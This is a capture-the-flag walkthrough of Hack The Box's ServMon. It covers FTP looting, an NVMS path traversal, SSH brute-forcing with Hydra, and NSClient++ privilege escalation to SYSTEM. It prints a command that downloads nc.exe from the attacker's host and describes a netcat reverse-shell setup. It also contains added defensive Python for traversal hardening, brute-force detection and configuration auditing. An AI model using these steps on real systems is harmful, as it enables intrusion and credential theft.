ServMon

Difficulty: easy (3.7/10)

Type: CTF

OS: Windows


Lab configuration

First, download VirtualBox and Kali (or Parrot). When the machine is imported in VirtualBox, choose "Bridged Adapter" in the Network tab so that it has access to the internet. Start the machine and set it up as you like.

ServMon is a retired box on Hack The Box, and a VIP access ($10/month) is required to play it. Once you have it, connecting is very simple. The first thing to do is to download the connection pack at https://www.hackthebox.eu/home/htb/access. Then, open a terminal (make sure you are in the same directory as your connection file, yourname.ovpn) and type the following command:

openvpn yourname.ovpn

Where yourname is your username on Hack The Box. If you’re using Kali 2020, make sure to add sudo to the previous command.

When this is done, just look at the IP of the machine on HTB (Hack the Box). ServMon is given the IP 10.10.10.184.
We’re ready to start!

1. Scan the ports of the target

Let’s start by performing the usual nmap scan with the flags -sV for service version detection and -sC to run the default set of scripts.

[screenshot: nmap scan output]

There are many open ports, but we quickly see an interesting piece of information: anonymous FTP login is allowed, so we will be able to connect to the target and search for potential files.
There are a few common ports and services, among which two were also open on the other Windows machines:

There are also a few ports I have never seen so far:

It looks like we have a lot of possibilities! However, I don’t think we could go anywhere with SSH at this point. I will start by looking at FTP and HTTP, but I suspect we will have to exploit SMB on port 445… However, I don’t want to start Metasploit two minutes after starting this box… There are many things to explore, so let’s go through them and learn some stuff! We will also search Exploit-DB for any exploit for Nagios, NRPE and Napster.

Let’s go!

2. Find and exploit vulnerabilities

FTP

As we saw in the result of the nmap scan, anonymous login is allowed, so let’s see if we can find interesting files:

[screenshot: anonymous FTP login]

Note that I just pressed enter when I was asked for the password. Once logged in, we see the folder Users, and within it, the two users Nadine and Nathan. Great, we already have two usernames. Let’s look into those folders:

[screenshot: FTP listing of Nadine’s folder]

Nadine has a Confidential.txt file that can be downloaded to our Kali machine with the command get. The file will be saved in the folder from which we launched FTP. Let’s also see if Nathan has interesting files:

[screenshot: FTP listing of Nathan’s folder]

He has a “Notes to do.txt” file, which we download the same way we did for the previous one. Now, let’s look at what they contain.

[screenshot: contents of Confidential.txt and "Notes to do.txt"]

In Nadine’s note, we see that she left the Passwords.txt file on Nathan’s Desktop. This might be interesting if we can access it at some point.
In Nathan’s note, there is a todo list showing that he still hasn’t uploaded the passwords, removed public access to NVMS, or placed the secret files in SharePoint.

I don’t know what NVMS and SharePoint are, so let’s search on the internet. NVMS could be Latitude NVMS, a network-based video management software platform that allows for streamlined provisioning of client software with automatic updates.

Microsoft SharePoint allows creating websites and storing, organizing and sharing information. It only requires a web browser.

Let’s keep this information in mind, but not focus on it at the moment. We already have interesting information, so let’s move to another port!

SSH

We found two usernames with FTP, and it’s worth trying to SSH with them. Unfortunately, I couldn’t get in this way (I tried a few passwords such as admin, Nadine, Nathan, 1234, etc.).

HTTP

We saw there is a web server running, so let’s check what’s there!

[screenshot: NVMS web login page]

Well, it looks like NVMS is the platform we talked about earlier. In the todo list, Nathan mentioned removing NVMS public access. I checked on the internet for default credentials but didn’t find anything.
I also tried different combinations of usernames and passwords, to no avail. Anyway, I don’t know if having access to this platform would help us… Let’s use dirbuster to see if there is any other interesting page. If there isn’t, we might try to bruteforce the password for Nathan or Nadine.

[screenshot: dirbuster results]

Dirbuster found 2 pages, but nothing interesting… One is just an icon, and the other one redirects us to the NVMS login screen. It didn’t find /Pages though, because it is not in the common.txt wordlist. So let’s run another dirbuster scan against 10.10.10.184/Pages. Once again, it didn’t find anything. To bruteforce a password, we would need to know the type of request being sent to the server. I used Burp Suite to intercept the request and look at its parameters:

[screenshot: login request intercepted in Burp Suite]

We see the POST request; however, it says that the connection is closed and the only parameter is the cookie… Maybe this is related to the removal of public access to NVMS, and we can’t access it anymore?

Let’s look for any NVMS exploit.

[screenshot: searchsploit nvms]

There is only one exploit for NVMS, and it’s a directory traversal attack. We can look at the exploit on exploit-db (https://www.exploit-db.com/exploits/47774). We see that if we send the GET request described there to the server, it should answer with:

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
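The NVMS bug above is a textbook path traversal: the server joins the requested URL path onto its document root without normalising the ".." segments, so a request for ../../windows/win.ini walks out of the web root and reads an arbitrary file. The following is an added example, not code from the original post or from NVMS, showing the naive lookup next to a hardened one that URL-decodes, normalises and then checks that the result is still inside the document root. The document root /var/www/nvms and the function names are assumptions for illustration (the real NVMS root is not stated on the page); backslashes are treated as separators because a Windows server accepts both.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed document root for the example (NVMS's real root is not stated on the page).
WEB_ROOT = "/var/www/nvms"


def naive_resolve(requested: str, root: str = WEB_ROOT) -> str:
    """What a vulnerable handler does: glue the URL path onto the root as-is.

    The '..' segments survive, so the OS resolves them and the file read
    lands outside the document root.
    """
    return root + "/" + requested.lstrip("/")


def safe_resolve(requested: str, root: str = WEB_ROOT) -> Optional[str]:
    """Resolve a URL path inside the document root, or return None if it escapes.

    1. URL-decode, so %2e%2e and %5c cannot hide a traversal.
    2. Treat backslashes as separators, since Windows accepts both.
    3. Normalise '.' and '..' with posixpath.normpath.
    4. Accept only the root itself or a descendant of the root.
    """
    decoded = unquote(requested).replace("\\", "/")
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate == root or candidate.startswith(root.rstrip("/") + "/"):
        return candidate
    return None


if __name__ == "__main__":
    traversal = "/../../../../../../windows/win.ini"
    print("naive :", naive_resolve(traversal))   # still contains '..', escapes the root
    print("safe  :", safe_resolve(traversal))    # None: request rejected
    print("safe  :", safe_resolve("Pages/login.htm"))
```

The check is done on the normalised path rather than by searching the raw string for "..", because the raw string can be encoded, use backslashes, or contain a harmless "Pages/../Pages/login.htm" that normalises back inside the root.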

So, let’s launch Metasploit with the command msfconsole, and use the exploit. The options are the following:

[screenshot: Metasploit exploit options]

Here, I set RHOSTS as 10.10.10.184, which is the IP of the target. We see that FILEPATH is set by default to /windows/win.ini, which is what was given in the description. Hence, we should get the expected response. Let’s launch the exploit and see.

[screenshot: exploit launch]

The exploit worked and saved a file in /home/kali/.msf4/loot/. We go there and inspect it:

[screenshot: directory traversal response (win.ini)]

Great, we get the answer we expected. So, now we want to customize the request to get another file. We saw in Nadine’s note that she left the Passwords.txt file on Nathan’s Desktop, and that’s what we’re going to grab. We modify the request:

[screenshot: modified FILEPATH option]

And we see that a file got saved in the same directory as before. Let’s inspect it.

[screenshot: contents of Passwords.txt]

There are 7 passwords, one of which probably grants access to the server. I copied those passwords into a file pass.txt that I created on my Kali desktop with nano. I also created a file called users.txt, containing the users Nadine, nadine, Nathan and nathan.

[screenshot: creation of users.txt and pass.txt]

I did this in order to use those usernames and passwords as lists in Hydra to bruteforce the credentials. The command is the following:

[screenshot: password bruteforcing with Hydra]

We see that both usernames nadine and Nadine work. Now that we’ve got the password, we can SSH:

[screenshot: SSH login with the recovered credentials]

Once in, we use the commands dir to list the content of directories, cd to change directory, and type to see the content of files. The user flag is on the desktop, so let’s get there.

[screenshot: user flag]

That’s it for the user flag!
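From the defender’s side, the Hydra run above leaves an obvious trace: a burst of failed logins from a single source, spread over a couple of usernames, followed by a success from that same source. The script below is an added example, not part of the original post, that runs exactly that detection over constructed sshd-style log lines. The line format is OpenSSH’s syslog message format (on Windows the same "Failed password for ..." messages appear in the OpenSSH/Operational event log instead); the year is supplied by the parser since syslog lines omit it, and the threshold of 5 failures in 60 seconds is illustrative.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import List, Optional, Tuple

# Constructed sshd-style log lines (not from the box): six failures across
# three usernames from one source in a few seconds, then a success, then an
# unrelated single failure from another host half an hour later.
SAMPLE_LOG = """\
Apr 12 10:01:02 servmon sshd[1201]: Failed password for nadine from 10.10.14.14 port 50211 ssh2
Apr 12 10:01:03 servmon sshd[1202]: Failed password for nadine from 10.10.14.14 port 50212 ssh2
Apr 12 10:01:04 servmon sshd[1203]: Failed password for nathan from 10.10.14.14 port 50213 ssh2
Apr 12 10:01:05 servmon sshd[1204]: Failed password for invalid user admin from 10.10.14.14 port 50214 ssh2
Apr 12 10:01:06 servmon sshd[1205]: Failed password for nathan from 10.10.14.14 port 50215 ssh2
Apr 12 10:01:07 servmon sshd[1206]: Failed password for nadine from 10.10.14.14 port 50216 ssh2
Apr 12 10:01:09 servmon sshd[1207]: Accepted password for nadine from 10.10.14.14 port 50217 ssh2
Apr 12 10:30:00 servmon sshd[1310]: Failed password for nadine from 10.10.10.50 port 40001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+ ssh2$"
)

Event = Tuple[datetime, str, str, str]  # (timestamp, result, user, source ip)


def parse_line(line: str, year: int = 2020) -> Optional[Event]:
    """Parse one sshd auth line; syslog omits the year, so it is supplied (assumed)."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_spraying(lines, threshold: int = 5, window_s: int = 60) -> List[str]:
    """Flag a source once it reaches `threshold` failures inside a sliding window,
    and flag any later successful login from a flagged source."""
    events = [e for e in (parse_line(l) for l in lines) if e is not None]
    events.sort(key=lambda e: e[0])
    recent_failures = defaultdict(list)   # ip -> failure timestamps inside the window
    users_tried = defaultdict(set)        # ip -> usernames attempted
    flagged = set()
    alerts = []
    for ts, result, user, ip in events:
        if result == "Failed":
            users_tried[ip].add(user)
            window = [t for t in recent_failures[ip] if (ts - t).total_seconds() <= window_s]
            window.append(ts)
            recent_failures[ip] = window
            if len(window) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(
                    f"BRUTE_FORCE from {ip}: {len(window)} failures within {window_s}s, "
                    f"users tried: {', '.join(sorted(users_tried[ip]))}"
                )
        elif ip in flagged:
            # A success right after a flagged burst is the alert worth paging on.
            alerts.append(f"SUCCESS_AFTER_BRUTE_FORCE from {ip} as {user}")
    return alerts


if __name__ == "__main__":
    for alert in detect_spraying(SAMPLE_LOG.splitlines()):
        print(alert)
```

The single failure from 10.10.10.50 never reaches the threshold and stays silent, which is the point of the sliding window: one mistyped password is noise, a burst across several accounts from one address is not.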

From there, we keep enumerating to find something that would help us get root. We see there’s an NSClient++ directory. Note that we saw this service in the initial nmap scan: it was on TCP port 8443 (service ssl/https-alt). It can be found here:

[screenshot: enumeration]

[screenshot: more enumeration]

NSClient++ is an agent that was originally designed to work with Nagios, but it is now a monitoring agent that can be used with numerous monitoring tools. We saw in the scan that Nagios is using a plugin on port 5666. Let’s look in Exploit-DB for an NSClient++ exploit:

[screenshot: searchsploit nsclient]

There is something, but after launching Metasploit with msfconsole and looking for the exploit with search nsclient, it doesn’t find it. We could add the exploit to Metasploit (as we did in OpenAdmin https://jsom1.github.io/_walkthroughs/OpenAdmin), but first, let’s look at the content of the file:

[screenshots: the exploit’s documentation, in three parts]

We see that it would be useless to import it into Metasploit, because it’s not an exploit per se: it describes the steps to follow to exploit the service manually. So, let’s go through them and get root!
The first step is to get a web administrator password:

[screenshot: exploit step 1, reading the web administrator password]

We see a plaintext password, as well as allowed hosts. Then, we have to login and enable some modules. However, if we look further in the previous file, we see the following information:

[screenshot: exploit step 1, enabled modules]

The scripts are already enabled. We’re going to log in anyway to check the “enable at startup” option. To do so, we forward a port: we listen on Kali’s port 8443 and send the requests to 127.0.0.1:8443 on the target.

[screenshot: exploit step 2, port forwarding]

We should now be able to access NSClient from the browser:

[screenshot: web GUI authentication failure]

The page is there but we can’t authenticate. This is because, as we saw in the allowed hosts, the page has to be requested from 127.0.0.1 (localhost). I tried to replace 10.10.10.184 in the address bar but it didn’t work for some reason (error: unable to connect). So, I looked at the API and saw that we can authenticate from the terminal:

[screenshot: NSClient++ API documentation]

[screenshot: API authentication]

We get a 200 code, meaning it worked. I don’t know why the web interface doesn’t work, so we will use the API from the terminal. Let’s look at the third point: we have to upload nc.exe and evil.bat from the attacking machine to C:\Temp on the target. We can use a curl command to do that. First, let’s find nc.exe, create evil.bat and gather both files on our desktop:

[screenshot: cp nc.exe]

We create evil.bat with nano and copy the code given in the exploit’s documentation:

[screenshot: evil.bat in nano, with the code from the exploit]

[screenshot: files on the desktop]

The 2 files are there and ready to be uploaded to the server. To do this, we start a web server on our Kali machine:

[screenshot: starting a web server]

We can check that it works by navigating to our own address (which can be seen with the command sudo ifconfig tun0):

[screenshot: checking the web server]

We can now use PowerShell to transfer the files from Kali to ServMon (I tried to do it with curl "http://10.10.14.14/nc.exe" -outfile "c:\temp\nc.exe", but I got permission denied):

[screenshot: file transfer]

We can see the files in C:\Temp, so we know the transfer worked.
The 4th step consists of setting up a listener on our Kali machine. We can use netcat to do that:

[screenshot: setting up the listener]

In the 5th and 6th steps, we have to add a scheduler that calls the script every minute:

[screenshot: adding the scheduler]

At this point, we’re supposed to restart the machine. However, I checked my permissions and saw the following:

[screenshot: whoami]

We’re nt authority\system. The last thing to do is to navigate to the administrator’s desktop to grab the root flag:

[screenshot: root flag]

That’s it!
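The privilege escalation above only works because several NSClient++ settings line up at once: the web administrator password sits in plaintext in nsclient.ini, the CheckExternalScripts and Scheduler modules are enabled, and a script can be registered from a user-writable directory such as C:\Temp. Restricting allowed hosts to 127.0.0.1 did not help once a low-privileged user could forward the port. The audit script below is an added example, not part of the original post or of NSClient++, that parses an nsclient.ini and reports exactly those conditions. The sample configuration is constructed, the section and key names are the ones NSClient++ uses for these settings as far as I know, and the install directory C:\Program Files\NSClient++ is an assumption.

```python
import configparser
from pathlib import PureWindowsPath
from typing import List

# Assumed NSClient++ install directory: scripts that live anywhere else are flagged.
NSCLIENT_DIR = PureWindowsPath(r"C:\Program Files\NSClient++")

# Constructed sample nsclient.ini, not the box's real file. The section and key
# names are the ones NSClient++ uses for these settings (an assumption of this example).
SAMPLE_INI = r"""
[/settings/default]
allowed hosts = 127.0.0.1
password = ExamplePassword123

[/modules]
CheckExternalScripts = enabled
Scheduler = enabled
WEBServer = enabled

[/settings/external scripts]
allow arguments = true
allow nasty characters = true

[/settings/external scripts/scripts]
check_temp = C:\Temp\check.bat
"""


def _enabled(value: str) -> bool:
    return value.strip().lower() in {"1", "true", "enabled", "yes"}


def _executable(command: str) -> PureWindowsPath:
    """First token of a command line, honouring a quoted path with spaces."""
    command = command.strip()
    if command.startswith('"'):
        return PureWindowsPath(command[1:command.find('"', 1)])
    return PureWindowsPath(command.split()[0])


def audit_nsclient_ini(text: str) -> List[str]:
    """Return finding codes for settings that make the NSClient++ host easy to abuse."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.optionxform = str  # keep CamelCase module names as written
    cp.read_string(text)
    findings: List[str] = []

    def section(name):
        return cp[name] if cp.has_section(name) else {}

    default = section("/settings/default")
    # The web admin password is stored in plaintext: anyone who can read the file has it.
    if default.get("password"):
        findings.append("PLAINTEXT_PASSWORD_IN_INI")
    hosts = [h.strip() for h in default.get("allowed hosts", "").split(",") if h.strip()]
    if any(h.endswith("/0") for h in hosts):
        findings.append("ALLOWED_HOSTS_UNRESTRICTED")

    modules = section("/modules")
    ext_scripts = _enabled(modules.get("CheckExternalScripts", ""))
    if ext_scripts:
        findings.append("EXTERNAL_SCRIPTS_ENABLED")
    # External scripts plus the scheduler lets a web admin run code as SYSTEM on a timer.
    if ext_scripts and _enabled(modules.get("Scheduler", "")):
        findings.append("SCHEDULER_WITH_EXTERNAL_SCRIPTS")

    ext = section("/settings/external scripts")
    if _enabled(ext.get("allow arguments", "")):
        findings.append("ALLOW_ARGUMENTS")
    if _enabled(ext.get("allow nasty characters", "")):
        findings.append("ALLOW_NASTY_CHARACTERS")

    # A script outside the install directory most likely sits in a user-writable path.
    for name, command in section("/settings/external scripts/scripts").items():
        if NSCLIENT_DIR not in _executable(command).parents:
            findings.append(f"SCRIPT_OUTSIDE_INSTALL_DIR:{name}")
    return findings


if __name__ == "__main__":
    for finding in audit_nsclient_ini(SAMPLE_INI):
        print(finding)
```

Run against the sample, it reports the plaintext password, the external-scripts/scheduler combination, the permissive argument settings and the script in C:\Temp, but not the allowed hosts, which illustrates the lesson from the box: the localhost restriction is real, it is just not the control that mattered here. Restricting read access to nsclient.ini and disabling the modules that are not needed for monitoring are the fixes the findings point at.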

My thoughts

That was a cool box, although I found the steps for getting root were badly explained. I spent a lot of time getting it to work. I particularly liked the way we get the user’s flag. It was also great to learn about NVMS and NSClient++. I still don’t know why we couldn’t log in via the webpage, but I think it would have been easier if it worked.